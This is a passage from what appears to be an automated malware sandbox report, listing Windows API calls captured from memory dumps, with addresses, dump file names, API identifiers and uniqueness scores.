                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 01E80FB0
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0057AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 01E81148
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 0057AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0057BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 01E808E5
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 0057A39C
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01E8132F
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 01E80640
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0057AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 0057AA71
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 01E8099C
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 01E80819
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 0057ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0057BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0057A23E
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01E8109E
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 01E801D0
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01E8132F
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0057A94A
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 01E80FB0
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01E80502
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 01E80640
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 0057ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 01E81148
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 0057A39C
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 01E8099C
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 0057AA71
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 0057A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 0057A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01E9AD37
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01E9AD37
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01E9B329
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01E9B329
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027B01D0
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 027B072D
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 027B0DD6
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 01E9AFBE
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 01E9BDBC
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 027B109E
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 01E9B0AE
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 01E9A23E
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 027B0819
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 027B0502
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 027B072D
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 027B08E5
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01E9A94A
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 027B0DD6
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 01E9BDBC
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 01E9B0AE
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 027B0FB0
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01E9AB1A
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 027B1148
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 01E9AFBE
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01E9BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 027B08E5
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 027B132F
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 027B0640
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01E9AB1A
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01E9AA71
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 027B099C
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 027B0819
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01E9ABC9
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01E9BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 01E9A23E
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 027B109E
                                                        Memory Dump Source
